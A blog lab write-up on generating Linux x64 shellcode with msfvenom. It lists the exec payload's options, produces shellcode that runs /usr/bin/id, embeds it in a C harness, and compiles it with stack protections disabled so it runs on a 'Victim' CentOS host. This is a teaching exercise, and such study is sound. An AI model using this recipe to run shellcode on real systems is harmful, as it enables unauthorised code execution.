
Extracting shellcode with msfvenom

GGkeeper 2022. 1. 3. 21:45

Lab> Extracting shellcode with msfvenom

Attacker# msfvenom -h
Attacker# ls -l /usr/bin/msfvenom
Attacker# ls -l /etc/alternatives/msfvenom
Attacker# ls -l /usr/share/metasploit-framework
Attacker# msfvenom -l payloads 
Attacker# msfvenom -l payloads | grep linux/x64/exec
    linux/x64/exec                                      Execute an arbitrary command or just a /bin/sh shell

Checking the payload options
Attacker# msfvenom -p linux/x64/exec --list-options
Options for payload/linux/x64/exec:
=========================


       Name: Linux Execute Command
     Module: payload/linux/x64/exec
   Platform: Linux
       Arch: x64
Needs Admin: No
 Total size: 21
       Rank: Normal

Provided by:
    ricky
    Geyslan G. Bem <geyslan@gmail.com>

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
CMD                    no        The command string to execute

Description:
  Execute an arbitrary command or just a /bin/sh shell



Advanced options for payload/linux/x64/exec:
=========================

    Name                     Current Setting  Required  Description
    ----                     ---------------  --------  -----------
    AppendExit               false            no        Append a stub that executes the exit(0) system
                                                        call
    MeterpreterDebugLevel    0                yes       Set debug level for meterpreter 0-3 (Default ou
                                                        tput is strerr)
    NullFreeVersion          false            yes       Null-free shellcode version
    PrependChrootBreak       false            no        Prepend a stub that will break out of a chroot
                                                        (includes setreuid to root)
    PrependFork              false            no        Prepend a stub that starts the payload in its o
                                                        wn process via fork
    PrependSetgid            false            no        Prepend a stub that executes the setgid(0) syst
                                                        em call
    PrependSetregid          false            no        Prepend a stub that executes the setregid(0, 0)
                                                         system call
    PrependSetresgid         false            no        Prepend a stub that executes the setresgid(0, 0
                                                        , 0) system call
    PrependSetresuid         false            no        Prepend a stub that executes the setresuid(0, 0
                                                        , 0) system call
    PrependSetreuid          false            no        Prepend a stub that executes the setreuid(0, 0)
                                                         system call
    PrependSetuid            false            no        Prepend a stub that executes the setuid(0) syst
                                                        em call
    RemoteMeterpreterDebugF                   no        Redirect Debug Info to a Log File
    ile
    VERBOSE                  false            no        Enable detailed status messages
    WORKSPACE                                 no        Specify the workspace for this module

Evasion options for payload/linux/x64/exec:
=========================

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------


Output format options
msfvenom --help-formats  <-- this option has been renamed in newer versions, so check again!

Extracting the shellcode for a command
Attacker# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),120(wireshark),142(kaboxer)

Attacker# msfvenom -p linux/x64/exec CMD=/usr/bin/id -f c -o shellcode1.c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of c file: 228 bytes
Saved as: shellcode1.c

Attacker# cat shellcode1.c
unsigned char buf[] =
"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52"
"\x66\x68\x2d\x63\x54\x5e\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
"\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b"
"\x58\x0f\x05";

Editing the source code
Turn the generated shellcode1.c into a complete C source file.
Attacker# vi shellcode1.c

/*
 * File name   : shellcode1.c
 * Description : shellcode test program
 * Author      : linuxmasternet
 * Date        : 2022.01.3
 */
#include <stdio.h>

// shellcode that runs id (msfvenom linux/x64/exec, CMD=/usr/bin/id)
unsigned char buf[] =
"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52"
"\x66\x68\x2d\x63\x54\x5e\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
"\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b"
"\x58\x0f\x05";

int main()
{
    // treat the byte array as a function and jump into it;
    // this only works if the memory holding buf is executable
    int (*shellcode)();
    shellcode = (int(*)())buf;
    (*shellcode)();

    return 0;
}


Compiling and running
Compile the source code and run it.
Modern operating systems prevent, by default, the execution of code placed in memory (on the stack), even when executable code has been loaded there.
Attacker# gcc -o shellcode1 shellcode1.c
Attacker ~# echo $SHELL
/bin/bash

Attacker# ./shellcode1
segmentation fault 

Disable the memory protection options at compile time so that code placed in memory (on the stack) can be executed.
Attacker# gcc -fno-stack-protector -z execstack -o shellcode1 shellcode1.c
Attacker# ./shellcode1
Segmentation fault

Since it did not work on Kali, the file was copied to CentOS 7, compiled there, and run.
Victim# vi shellcode1.c

Victim# gcc -fno-stack-protector -z execstack -o shellcode1 shellcode1.c
Victim# ./shellcode1
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023